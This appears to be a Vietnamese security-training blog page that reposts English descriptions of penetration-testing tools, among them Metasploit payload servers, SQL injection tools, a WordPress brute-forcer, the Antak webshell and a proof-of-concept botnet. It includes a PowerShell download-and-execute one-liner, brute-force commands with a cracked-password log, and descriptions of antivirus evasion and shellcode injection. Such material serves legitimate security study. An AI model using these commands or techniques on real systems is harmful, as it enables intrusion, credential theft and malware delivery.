Thủ Phủ Hacker Mũ Trắng Buôn Ma Thuột

Chương trình Đào tạo Hacker Mũ Trắng Việt Nam tại Thành phố Buôn Ma Thuột kết hợp du lịch. Khi đi là newbie - Khi về là HACKER MŨ TRẮNG !

Hacking Và Penetration Test Với Metasploit

Chương trình huấn luyện sử dụng Metasploit Framework để Tấn Công Thử Nghiệm hay Hacking của Security365.

Tài Liệu Computer Forensic Của C50

Tài liệu học tập về Truy Tìm Chứng Cứ Số (CHFI) do Security365 biên soạn phục vụ cho công tác đào tạo tại C50.

Sinh Viên Với Hacking Và Bảo Mật Thông Tin

Cuộc thi sinh viên cới Hacking. Với các thử thách tấn công trang web dành cho sinh viên trên nền Hackademic Challenge.

Tấn Công Và Phòng Thủ Với BackTrack / Kali Linux

Khóa học tấn công và phòng thủ với bộ công cụ chuyên nghiệp của các Hacker là BackTrack và Kali LINUX dựa trên nội dung Offensive Security

Sayfalar

Maligno - Penetration Testing Tool that Serves Metasploit Payloads


Maligno is an open source penetration testing tool that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Changelog: Metasploit multi-host support, socks4a server support (metasploit), last resort redirection for invalid requests and hosts out of scope, automatic client code obfuscation, delayed client payload execution, automatic metasploit resource file generation. 

Features
  • Encrypted communications: Maligno is a web server which communicates via HTTP or HTTPS with the clients. Communications are encrypted with AES and encoded with Base64 both for HTTP and HTTPS. Encryption and encoding parameters can be configured. Clients do NOT validate the server certificate by default.
  • On the fly shellcode generation – per session mode: Maligno will generate shellcode while starting up, and it will cache it for later use. Maligno will serve the cached shellcode to all clients that request it during the session. Maligno will maintain a cache for each configured Metasploit payload. The cache is removed when Maligno is shut down.
  • Multi-payload support: You may configure Maligno with several Metasploit payloads. Clients can request different payloads to the server. Payloads are referred by an index, which is passed as a GET parameter. Such parameter can be also configured.
  • Multi-server support: Maligno can run on a single server with Metasploit or in separate machines. Clients will connect to Maligno, and Maligno will generate shellcode that points to a pre-configured Metasploit multi-handler.
  • SOCKS4a proxy support: Maligno helps you starting a Metasploit auxiliary socks4a proxy, which can be used with payloads such as reverse_https_proxy. This will allow you to send all your traffic through your Maligno server, in case of having a multi-server environment.
  • Scope definition: Maligno allows you to define single IP addresses or ranges. This will ensure that your shellcode is served only to machines involved in your pentest. You may also use a wildcard in order to accept ANY address.
  • Last resort redirection: Maligno will redirect hosts out of scope, or hosts sending invalid requests, to a configured URL.
  • Client code generator and pseudorandom obfuscator: Maligno comes with a script that will generate and obfuscate (pseudorandomly) client code ready for use, based on your server configuration.
  • Delayed client execution: Maligno clients use a basic random execution delay, which attempts to bypass AV-sandboxes.
  • Metasploit resource file generator: Maligno generates MSF resource files based on your configuration, which can be used with msfconsole right away.

Dradis v2.9 - Information Sharing For Security Assessments

Dradis is an open source framework to enable effective information sharing, specially during security assessments. It’s a tool specifically to help in the process of penetration testing. Penetration testing is about information:
  1. Information discovery
  2. Exploit useful information
  3. Report the findings

But penetration testing is also about sharing the information you and your teammates gather. Not sharing the information available in an effective way will result in exploitation opportunities lost and the overlapping of efforts.

Dradis is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far, and what is still ahead.

Features

  • Easy report generation.
  • Support for attachments.
  • Integration with existing systems and tools through server plugins.
  • Platform independent.
Traditional pentesting teams face different types of challenges regarding information sharing. Different tools provide output in different formats, different testers capture evidence in different ways, different companies report differently, etc.


If you do not use a tool to share the information, every tester will use their own notes file to keep track of their findings. Each will store this file locally, or on a shared resource, but the information will not arrive immediately to the rest of the team.

If you want to know what are the latest findings of your mate, you will need to look for the notes file. You also can try talking, but talking is not that effective when you need to know a specific cookie value or a sql query for an injection attack.

It seems reasonable that some effort must be put to increase the quality and efficiency of this process.


The Mole - Automatic SQL Injection Exploitation Tool

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.

Features

  • Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
  • Command line interface. Different commands trigger different actions.
  • Auto-completion for commands, command arguments and database, table and columns names.
  • Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
  • Exploits SQL Injections through GET/POST/Cookie parameters.
  • Developed in python 3.
  • Exploits SQL Injections that return binary data.
  • Powerful command interpreter to simplify its usage.

SmartSPLAT - Tool to troubleshoot Checkpoint firewall issues and perform management tasks


Smart SPLAT is a freeware software to troubleshoot Checkpoint firewall issues and perform management tasks.

It periodically checks for an update and when a new release is published, updates itself via the SmartSPLAT web site.

SmartSPLAT lets you connect to your firewall via secure channel SSH
Critical commands like cpstop, kill, reboot and etc. deleting a license or similar commands that can cause your firewall not to function properly are colored red protected by checkboxes and shows confirmation dialogs.

In this project we have used an ssh Library based on the Poderosa project.

For file transfer operations, SmartSPLAT uses putty pscp.exe, to work with SCP /etc/scpusers/ file should be modified.

Smart SPLAT has a script named preparescp. It checks if user exists at /etc/scpusers/ if not, adds a line for it.


Smart Pentester - An SSH based Penetration Testing Framework



Smart Pentester is an SSH based Penetration Testing Framework. It provides a GUI for well known tools like nmap, hping, tcpdump, volatility, hydra and etc.

Smart Pentester Framework will provide you a User Interface for Penetration testing, Malware Analysis, Forensic Analysis, Cyber Intelligence, Advanced packet generation techniques and more...

Hexorbase - Multiple Database Management and Audit Tool


HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

It works on Linux and Windows running the following:

Requirements:

  • python
  • python-qt4
  • cx_Oracle
  • python-mysqldb
  • python-psycopg2
  • python-pymssql
  • python-qscintilla2


To install simply run the following command in terminal after changing directory to the path were the downloaded package is:
root@host:~# dpkg -i hexorbase_1.0_all.deb


WebSiteSniffer v1.41 - Captures all Web site files downloaded by your Web browser while browsing the Internet



WebSiteSniffer is a packet sniffer tool that captures all Web site files downloaded by your Web browser while browsing the Internet, and stores them on your hard drive under the base folder that you choose. WebSiteSniffer allows you to choose which type of Web site files will be captured: HTML Files, Text Files, XML Files, CSS Files, Video/Audio Files, Images, Scripts, and Flash (.swf) files.

While capturing the Web site files, the main window of WebSiteSniffer displays general statistics about the downloaded files for every Web site / host name, including the total size of all files (compressed and uncompressed) and total number of files for every file type (HTML, Text, Images, and so on)


HackPorts - Mac OS X Penetration Testing Framework and Tools

HackPorts was developed as a penetration testing framework with accompanying tools and exploits that run natively on Mac platforms. HackPorts is a ‘super-project’ that leverages existing code porting efforts, security professionals can now use hundreds of penetration tools on Mac systems without the need for Virtual Machines.

Tool List:
  • 0trace
  • 3proxy
  • Air – Automated Image Installer
  • Android APK Tool
  • Android SDK Framework
  • Apache Users
  • Autospy
  • BLINDELEPHANT
  • BRAA
  • Bed
  • Beef
  • Binwalk
  • Btdsd
  • CHKRootKit
  • CHNTPwd
  • Casefile – Maltego
  • Cewl
  • Cisc0wn
  • Cisco Scanner (ciscos)
  • Cisco Torch
  • Cisco global exploiter
  • Credump
  • Creepy
  • Crunch
  • Cupp
  • CutyCapt
  • DBD (Durandal’s Backdoor)
  • DDSquat
  • DD_Rescue
  • DHCPig
  • DNSChef
  • DNSMAP
  • DNSRECON
  • DNSTRACER
  • DNmap
  • DPScan
  • DarkStat
  • DavTest
  • DeD
  • DerogDom
  • DirBuster
  • Dozer (Formally Mercury)
  • Droidbox
  • Encryption Wizard
  • EvilGrade
  • ExifTool
  • Exiting the Social-Engineer Toolkit (SET)
  • ExploitDB
  • FIERCE2
  • FTester
  • Fast-Track
  • Flasm
  • GoldenEye
  • Golismero
  • Grabber
  • Grendle Scan
  • HIOC
  • HashTag
  • Hashcat-utils
  • Hexinject
  • IAXFlood
  • IDAPro-Free
  • Intersect
  • Inundator
  • JBoss-Autopwn
  • JD – Java Decompiler
  • JavaLOIC.jar
  • John
  • Johnny
  • Joomscan
  • Kautilya
  • Killerbee
  • Kismac2
  • Laudanum
  • Libhijack
  • Linux Exploit Suggester
  • Lynis
  • MagicTree
  • MaskGen
  • Metagoofil
  • Mork.pl
  • Multimac
  • Netdiscover
  • Netifera
  • Nikto
  • ONESIXYONE
  • OWASP Mantra
  • OllyDbg – Debugger
  • OpenVas
  • OphCrack
  • Padbuster
  • Passdb
  • Patator
  • Patator
  • PdfBook
  • PeachFuzz
  • Phrasen | Drescher
  • Powerfuzzer
  • Pyrit
  • RFIDIOt
  • RSMangler
  • Rebind
  • Rec-Studio
  • ReverseRaider
  • SCTPScan
  • SFUZZ
  • SIPARMYKNIFE
  • SMBExec
  • SMTP-USER-ENUM
  • SNMPCheck
  • SPAMHole
  • SQLLHF
  • SSLCaudit
  • SSLSniff
  • SSLStrip
  • SUCrack
  • Samdump
  • Sipcrack
  • Skipfish
  • Smali
  • Smartphone-Pentest-Framework
  • StatProcessor
  • TCPReplay
  • TLSSLed
  • TWOFI
  • TestDisk
  • TestSSL
  • ToolName
  • Truecrack
  • UAtester
  • UBERHARVEST
  • Unicornscan
  • Uniscan
  • Vega
  • Vinetto
  • Volatility
  • W3af
  • WCE – Windows Credential Editor
  • WIFITap
  • WOL-E
  • WPScan
  • Waffit
  • Wapiti
  • Web Backdoor Compilation (wbc)
  • Webscrab – OWASP
  • Webshag
  • Webslayer
  • Whatweb
  • XSpy
  • acccheck
  • adsnmp
  • aircrack-ng
  • artemisa
  • asp-audit.pl ASP Auditor
  • automater
  • bbqsql
  • bluediving
  • bluelog
  • bluemaho
  • bluepot
  • blueranger
  • bt-attacks
  • burpsuite
  • c07-sip-r2.jar
  • cdpsnarf
  • cisco-auditing-tool
  • cmospwd
  • cms-explorer
  • copy-router-config
  • cymothoa
  • darkMySQLi
  • dbpwaudit
  • deBlaze
  • dedected
  • dex2jar
  • dirb
  • dns2tcpc
  • dnsenum
  • dotdotpwn
  • easy-creds
  • enumIAX
  • evtparse.pl Parse Event log (Win2000, XP, 2003)
  • fierce
  • fimap
  • findmyhash.py
  • getsids
  • giskismet
  • goofile
  • goohost
  • gooscan
  • hack library
  • hash_id.py – Hash Identifer
  • hashcat
  • hexorbase
  • htexploit
  • httprint
  • httsquash
  • iWar
  • impacket-examples
  • intercepter-ng
  • iodine
  • iphoneanalyzer
  • ipv6toolset
  • jigsaw
  • keimpx.py
  • lanmap2
  • lbd – load balancing detector
  • letdown
  • make-pdf-javascript.py
  • manglefizz
  • mdb-export
  • merge-router-config
  • miranda
  • mitmproxy
  • mopest-2.pl
  • netgear-telnetenable
  • nimbostratus
  • oat (Oracle Auditing Tool)
  • ocs (OCS Cisco Scanner)
  • oscanner
  • packetstorm
  • pdf-parser
  • pdfid.py
  • pdgmail
  • peePDF
  • phrasenoia
  • pipal
  • plecost
  • pompem
  • powersploit
  • pref – Parse contents of XP/Vista Prefetch files/directory
  • proxystrike
  • ptunnel
  • pwnat
  • pytbull
  • rcracki_mt
  • redfang – the bluetooth hunter
  • revealertoolkit
  • rtpflood
  • rtpinject
  • rtpinsertsound
  • rtpmixsound
  • samdump2
  • sapyto – SAP Penetration Testing Framework
  • sidguesser
  • sipp
  • sipscan
  • sipvicious
  • spooftooph
  • sqlbrute
  • sqldict
  • sqlmap
  • sqlninja
  • sqlscan
  • sqlsus
  • sslyze
  • swaks – Swiss Army Knife for SMTP
  • tftp brute force
  • thcsslcheck
  • theHarvester
  • thebackdoorfactory
  • tnscmdlOg
  • trixd00r
  • u3-pwn
  • udp.pl – UDP Flood
  • udptunnel
  • unix-priv-check
  • untidy – XML Fuzzer
  • voiphoney
  • volafox
  • warvox
  • websecurify
  • websploit
  • weevely
  • wfuzz
  • xsser
  • yersinia
  • zaproxy – OWAS Zap


Wireless Network Watcher - Show who is connected to your wireless network


Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network.

For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name.

You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.


Remote DLL - Simple & Free Tool to Inject or Remove DLL from Remote Process


RemoteDLL is the simple tool to Inject DLL or Remove DLL from Remote Process. It is based on popular Dll Injection technique.

It supports following DLL Injection methods
  • CreateRemoteThread
  • NtCreateThread [Good for DLL Injection across sessions on Vista/Windows 7]
  • QueueUseAPC [Delayed Injection]
Removing DLL or Freeing DLL from Process is the unique feature of RemoteDLL. It can help you to instantly remove DLL from target process completely.

Now a days, many Malware & Spyware programs use the DLL Injection technique to hide themselves into legitimte system process. Once injected there is no way to remove such DLL other than killing the process itself.

In such situations, RemoteDLL can help you to remove these Malicious DLLs from the target process easily.

Current mega version supports Injecting DLL and Removing DLL from 64 bit process along with numerous improvements for Windows 8.


ArchAssault - Arch Linux ISO for Penetration Testers


The ArchAssault Project is an Arch Linux derivative for penetration testers, security professionals and all-around Linux enthusiasts. This means we import the vast majority of the official upstream Arch Linux packages, these packages are unmodified from their upstream source.

While our Arch Linux base is primarily untouched, there are times were we have to fork a package to be able to better support our vast selection of tools. All of our packages strive to maintain the Arch Linux standards, methods and philosophies.


wpbf - WordPress Brute Force

The script will try to login into the WordPress dashboard through the login form using a mixture of enumerated usernames, a wordlist and relevant keywords from the blog's content. If a single username is given, the script will not search for additional usernames.

When a correct username/passwords matchs, it will be logged and show on the standard output.

For faster results you can spawn threads but BE CAREFULL not to flood/DoS the site. Default settings can be changed in "config.py" and "logging.conf" files.

The wordlist must have one entry per line, a small wordlist (wordlist.txt) and plugin list (plugins.txt) are provided for testing purposes.

Features

  • Username enumeration and detection (TALSOFT-2011-0526, Author's archive page and content parsing)
  • Threads
  • Use keywords from blog's content in the wordlist
  • HTTP Proxy Support
  • Basic WordPress fingerprint (version and full path)
  • Advance plugins fingerprint (bruteforce, discovery and version/documentation)
  • Detection of Login LockDown plugin (this plugin makes the bruteforce useless)
  • Advanced logging using Python's logging library and logging configuration file

Usage

Basic

In this example, wpbf will do a bruteforce test using the default settings (you can change the default settings in config.py). It will enumerate usernames, find keywords and plugins, use the static+generated wordlist to bruteforce each user and try to guess remote path:
$ ./wpbf.py http://localhost/wordpress/
2012-02-26 14:26:18,793 - INFO - Target URL: http://localhost/wordpress/
2012-02-26 14:26:18,844 - INFO - Checking URL and username...
2012-02-26 14:26:18,845 - INFO - Enumerating users...
2012-02-26 14:26:52,027 - INFO - Usernames: admin, test, guest
2012-02-26 14:26:54,153 - INFO - 31 plugins will be tested
2012-02-26 14:26:55,311 - INFO - 215 passwords will be tested
2012-02-26 14:26:55,369 - INFO - Starting workers...
2012-02-26 14:26:56,685 - INFO - WordPress version: 3.0.1
2012-02-26 14:26:57,570 - INFO - WordPress path in server: /var/www/wordpress/
2012-02-26 14:27:08,624 - INFO - Plugin 'akismet' was found
2012-02-26 14:27:10,292 - INFO - Plugin 'akismet' version: 2.5.5 (more info @ http://localhost/wordpress/wp-content/plugins/akismet/readme.txt)
221 tasks left / 2.1 tasks per second / 1.76min left
199 tasks left / 2.2 tasks per second / 1.51min left
172 tasks left / 2.7 tasks per second / 1.06min left
21 tasks left / 1.6 tasks per second / 0.22min left
2012-02-26 14:57:23,245 - INFO - Password 'qawsed' found for username 'admin' on http://localhost/wordpress/wp-login.php

Username enumeration only

The '-eu' or '--enumerateusers' parameter will only do username enumeration and list the usernames found
$ ./wpbf.py -eu http://www.mysite.com/blog/

Aggresive

You can spawn more threads to speed up the bruteforce process. Be aware that using a lot of threads can cause hangs in the server or denial of service. For this example we will spawn 23 threads:
$ ./wpbf.py -t 23 http://www.mysite.com/blog/

Custom

Using username 'john', not using keywords in the blog content for the wordlist and trough a local proxy:
$ ./wpbf.py --nokeywords -u john -p http://localhost:8008/ http://www.mysite.com/blog/


Automater v2.0 - URL/Domain, IP Address, and Md5 Hash OSINT Tool


Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal.

*Automater is installed on HoneyDrive and Kali by default but currently have an outdated version.

Installation:
Automater comes in two  flavors, python script that will work for Linux or Windows, and an exe for Windows.

Windows:
The Windows client is currently in development. In the meantime the python code will work on Windows with a python 2.7 install

Linux:
As this is a python script you will need to ensure you have the correct version of python, which for this script is python 2.7. I used mostly standard libraries, but just incase you don't have them, here are the libraries that are required: httplib2, re, sys, argparse, urllib, urllib2

With the python and the libraries out of the way, you can simply use git to clone the tekdefense code to your local machine.
git clone https://github.com/1aN0rmus/TekDefense-Automater.git

Usage:
Once installed the usage is pretty much the same across Windows, Linux, and Kali.
python Automater.py -h

or if you chmod +x Automater.py you can


./Automater.py -h

usage: Automater.py [-h] [-o OUTPUT] [-w WEB] [-c CSV] [-d DELAY] [-s SOURCE]

[--p]

target



IP, URL, and Hash Passive Analysis tool



positional arguments:

target List one IP Addresses, URL or Hash to query or pass

the filename of a file containing IP Addresses, URL or

Hash to query each separated by a newline.



optional arguments:

-h, --help show this help message and exit

-o OUTPUT, --output OUTPUT

This option will output the results to a file.

-w WEB, --web WEB This option will output the results to an HTML file.

-c CSV, --csv CSV This option will output the results to a CSV file.

-d DELAY, --delay DELAY

This will change the delay to the inputted seconds.

Default is 2.

-s SOURCE, --source SOURCE

This option will only run the target against a

specific source engine to pull associated domains.

Options are defined in the name attribute of the site

element in the XML configuration file

--p This option tells the program to post information to

sites that allow posting. By default the program will

NOT post to sites that require a post.


Windows Autologin Password Dumper & Manager v2.0


Windows Autologin Password is the free command-line tool to quickly dump and manage the Windows Automatic Logon Password.

Automatic Logon is one of the useful feature in Windows which allows you to login to system automatically without entering the password everytime. This tool helps you to easily dump the current Autologon password as well as quickly change the Autologon settings with just one command.
Here is the complete list of things that you can do with it,

  • Dump the Windows Auto Logon User & Password
  • Enable the Windows Auto Logon
  • Specify your Username & Password for Windows Auto Logon.
  • Disable the Windows Auto Logon

Once you set the Auto Logon username & password, you have to restart and next time you will be logged in automatically.
It is simple & easy to use tool. Also being a command-line based tool makes it perfect for automation.

'Windows Autologin Password' works on both both 32 bit & 64 bit versions and tested successfully on all Windows Platforms starting from Windows XP to latest version, Windows 8.


Hooker - Automated Dynamic Analysis of Android Applications


Hooker is an opensource project for dynamic analysis of Android applications. This project provides various tools and applications that can be use to automaticaly intercept and modify any API calls made by a targeted application. It leverages Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...) in an elasticsearch database. A set of python scripts can be used to automatize the execution of an analysis in order to collect any API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:
  1. APK-instrumenter is an Android application that must be installed prior to the analysis on an Android device (for instance, an emulator).
  2. hooker_xp is a python tool that can be use to control the android device and trigger the installation and stimulation of an application on it.
  3. hooker_analysis is a python script that can be use to collect results stored in the elasticsearch database.
  4. tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact informations.
  5. tools/apk_retriever is a Python tool that can be use to download APKs from various online public Android markets.
  6. tools/emulatorCreator is a script that can be use to prepare an emulator.

Passive Spider - Information Gathering from Search Engine Tool

Passive Spider uses search engines (currently only Bing supported) to find interesting information about a target domain.

INSTALL
git clone https://github.com/RandomStorm/passive-spider.git
cd passive-spider
gem install bundler && bundle install
Place your search engine API keys in the api_keys.config file. Each search engine API has different usage limits and pricing, refer to them for this information. Do not share your keys.
Tested on Mac OS X with Ruby 1.9.3 & Ruby 2.1.2.

ARGUMENTS

--domain   || -d    The domain you would like to use as a target.
--pages || -p The number of pages you would like to hit from the search engine. Default: 10
--all || -a Do all of the spidering checks. This is the default check.
--allpages Find all pages related to the domain, limited by the --pages option.
--allfiles Find all file types related to the domain, limited to the ones configured.
--neighbours Find other domains that are on the same IP address.
--urlkeywords Find page URLs that have 'interesting' keywords in them.
--keywords Find page content that have 'interesting' keywords in them.
--export || -e Request URLs through proxy.
Specify a proxy (type://ip:port) or use defaults. Default: http://127.0.0.1:8080
--help || -h This output.

USAGE

- Run all checks against the given domain...
ruby pspider.rb -d www.example.com

- Run all checks against the admin subdomain...
ruby pspider.rb -d admin.example.com

- Run all checks against the given domain, limited to 50 search engine pages...
ruby pspider.rb -d www.example.com -p 50

- Run the IP Neighbour check against the given domain...
ruby pspider.rb -d www.example.com --neighbours


YASAT - Yet Another Stupid Audit Tool



YASAT (Yet Another Stupid Audit Tool) is a simple stupid audit tool.
Its goal is to be as simple as possible with minimum binary dependencies (only sed, grep and cut)
Second goal is to document each test with maximum information and links to official documentation. 
It do many tests for checking security configuration issue or others good practice. 
It checks many software configurations like: 
  • Apache
  • Bind DNS
  • CUPS
  • PHP
  • kernel configuration
  • mysql
  • network configuration
  • openvpn
  • Packages update
  • samba
  • snmpd
  • squid
  • syslog
  • tomcat
  • user accounting
  • vsftpd
  • xinetd
YASAT is licensed under GPLv3


HashMyFiles - Calculate MD5/SHA1/CRC32 hashes of your files


HashMyFiles is small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files in your system. You can easily copy the MD5/SHA1 hashes list into the clipboard, or save them into text/html/xml file. 

HashMyFiles can also be launched from the context menu of Windows Explorer, and display the MD5/SHA1 hashes of the selected file or folder.

Using HashMyFiles

HashMyFiles doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file (HashMyFiles.exe). 

After you run it, you can add files and folders that you want to view their MD5/SHA1 hashes. You can do it by using the 'Add File' and 'Add Folder' options under the File menu, or simply by draging the files and folder from Explorer into the main window of HashMyFiles. 

After adding the desired files, you can copy the MD5/SHA1 hashes to the clipboard, or save the hashes list into text/html/xml file.

Shellter - A Dynamic ShellCode Injector


Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections, adding an extra section with RWE access,and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application.

Click here to read more.

PAExec - The Redistributable PsExec (Launch Remote Windows Apps)

PAExec lets you launch Windows programs on remote Windows computers without needing to install software on the remote computer first. For example, you could launch CMD.EXE remotely and have the equivalent of a terminal session to the remote server. PAExec is useful for doing remote installs, checking remote configuration, etc.


PAExec - The Redistributable PsExec

Microsoft's PsExec tool (originally by SysInternal's Mark Russinovich) is a favorite of system administrators everywhere. It just has two tiny flaws:
  1. PsExec can not be redistributed
  2. Sensitive command-line options like username and passwords are sent as clear text

We needed something that would overcome those two issues, and not finding a suitable replacement, decided to write our own.

Examples


PAExec \\{server IP address} -s cmd.exe
Creates a telnet-like session on the remote server, running as Local System.

PAExec \\{server IP address} ipconfig
View network configuration on the remote server without needing to do an RDP session.

PAExec \\{server IP address} -u {username} -p {password} -i -c MyApp.exe
Copy MyApp.exe to the remote server and run it as {username} so that it shows up on the remote server.

DarunGrim - A Patch Analysis and Binary Diffing Tool


DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality.

Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers.

This binary diffing technique is especially useful for Microsoft binaries. Not like other vendors they are releasing patch regularly and the patched vulnerabilities are relatively concentrated in small areas in the code. That makes the patched part more visible and apparent to the patch analyzers.


XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation


XSSYA work by execute the payload encoded to bypass Web Application Firewall which is the first method request and response if it respond 200 it turn to Method 2 which search that payload decoded in web page HTML code if it confirmed get the last step which is execute document.cookie to get the cookie


XSSYA Features
 * Support HTTPS
* After Confirmation (execute payload to get cookies)
* Can be run in (Windows - Linux)
* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)
*XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall)
* Support Saving The Web HTML Code Before Executing
the Payload Viewing the Web HTML Code into the Screen or Terminal

Nosql-Exploitation-Framework - A FrameWork For NoSQL Scanning and Exploitation Framework


A FrameWork For NoSQL Scanning, Enumeration and Exploitation.
NoSQL Databases are schema less databases. They were invented to store data easily and flexibly.
NoSQL Databases have gained popularity and its security has always been under the scanner.
The NoSQL Exploitation Framework focuses scanning,enumerating and exploiting these databases.
The tool has support for over 5 databases MongoDB,CouchDB,Redis,H-Base and Cassandra.

Added Features:

  • First Ever Tool With Added Support For Mongo,Couch,Redis,H-Base,Cassandra
  • Support For NoSQL WebAPPS
  • Added payload list for JS Injection,Web application Enumeration.
  • Scan Support for Mongo,CouchDB and Redis
  • Dictionary Attack Support for Mongo,Cocuh and Redis
  • Enumeration Module added for the DB's,retrieves data in db's @ one shot.
  • Currently Discover's Web Interface for Mongo
  • Shodan Query Feature
  • MultiThreaded IP List Scanner
  • Dump and Copy Database features Added for CouchDB
  • Sniff for Mongo,Couch and Redis

Installation

  • Run chmod+x install.sh nosqlmap.py
  • ./install.sh
  • nosqlexp.py -h (For Help Options)

Sample Usage

  • nosqlexp.py -ip localhost -scan
  • nosqlexp.py -ip localhost -dict mongo -file b.txt
  • nosqlexp.py -ip localhost -enum couch
  • nosqlexp.py -ip localhost -enum redis
  • nosqlexp.py -ip localhost -clone couch
  • nosqlexp.py -ip localhost -webapp "web_app_link"

Antak WebShell - A webshell which utilizes PowerShell


Antak is a webshell written in C#.Net which utilizes powershell. Antak is a part of Nishang and updates could be found here: https://github.com/samratashok/nishang

Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind while using commands (like changing current directory or running session aware scripts).

Executing PowerShell scripts on the target -
  1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
  2. Use powershell one-liner (example below) for download & execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
  3. By uploading the script to the target and executing it.
  4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.

Uploading a file - To upload a file you must mention the actual path on server (with write permissions) in command textbox. (OS temporary directory like C:\Windows\Temp may be writable.) Then use Browse and Upload buttons to upload file to that path.

Downloading a file - To download a file enter the actual path on the server in command textbox. Then click on Download button.

Main Features:
  • Upload a file
  • Download a file
  • Executing Scripts
  • Remoting/Pivoting

Moo0 File Monitor - Monitor file access easily


Moo0 File Monitor lets you easily monitor the file access activities on your system.
Have you ever wondered what's going on with your disk system behind your watch? Why the disk is busy? What's scratching your HDD? You may find them out using this simple program.


OWASP Mantra Security Toolkit - Browser Based Security Framework


OWASP Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

Mantra is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.

Mantra is a browser especially designed for web application security testing. By having such a product, more people will come to know the easiness and flexibility of being able to follow basic testing procedures within the browser. Mantra believes that having such a portable, easy to use and yet powerful platform can be helpful for the industry.

Mantra has many built in tools to modify headers, manipulate input strings, replay GET/POST requests, edit cookies, quickly switch between multiple proxies, control forced redirects etc. This makes it a good software for performing basic security checks and sometimes, exploitation. Thus, Mantra can be used to solve basic levels of various web.

Mantra Provides
  • A web application security testing framework built on top of a browser.
  • Supports Windows, Linux(both 32 and 64 bit) and Macintosh.
  • Can work with other software like ZAP using built in proxy management function which makes it much more convenient.
  • Available in 9 languages: Arabic, Chinese – Simplified, Chinese – Traditional, English, French, Portuguese, Russian, Spanish and Turkish
  • Comes installed with major security distributions including BackTrack and Matriux

Xenotix xBOT - A Cross Platform PoC Bot that abuse certain Google Services to implement it's C&C


Xenotix xBOT is a proof of concept cross platform (Linux, Windows, Mac) bot written in Python that abuse certain Google Services to implement Command & Control Center for the botnet. The Google Apps Data API, Google Forms and Google Spreadsheet is abused to implement C2 for a bot network. The Google Forms can act as the C2 for a bot network. All the entries to the Google Form are send to an attached Spreadsheet. Here we can implement a bot that will listen to the Google Data API URL and extract the commands and later send back the response via the same Form. The Google Data API allows us to fetch the contents of a published spreadsheet in a variety of formats. The spreadsheet feeds are fetched in RSS format and will parsed. For implementing the bot we will parse through the source, fetch the commands and do the corresponding operations. xBOT’s communication is encrypted as it uses Google’s own SSL connection and is nowhere affected by any firewalls as it works at Application layer. The botnet’s commands and responses are encrypted with SSL from Google Itself making it harder to sniff the bot’s communications in the network. It is a prototype bot with the bare minimum features of a Typical Bot. The intention of this tool is to give an idea about how Google API’s can be abused for Botnet Implementation.

xBOT COMMANDS
  • xSYSINFO : Get System Information
  • EXECUTE : Execute a passive system command
  • xDOWNLOAD : Download a file from an URL
  • xUPLOAD : Upload a file
  • xNETWORK : Get network information
  • xPORTSCAN : Run a Portscan
  • xSCREENSHOT : Grab a Screenshot
  • xKILL : Kill and Remove the xBOT.

Snoopy - A distributed tracking and data interception framework


Snoopy is a distributed tracking and profiling framework which can perform interesting tracking and profiling of mobile users through the use of WiFi.

There have been recent initiatives from numerous governments to legalise the monitoring of citizens’ Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism.

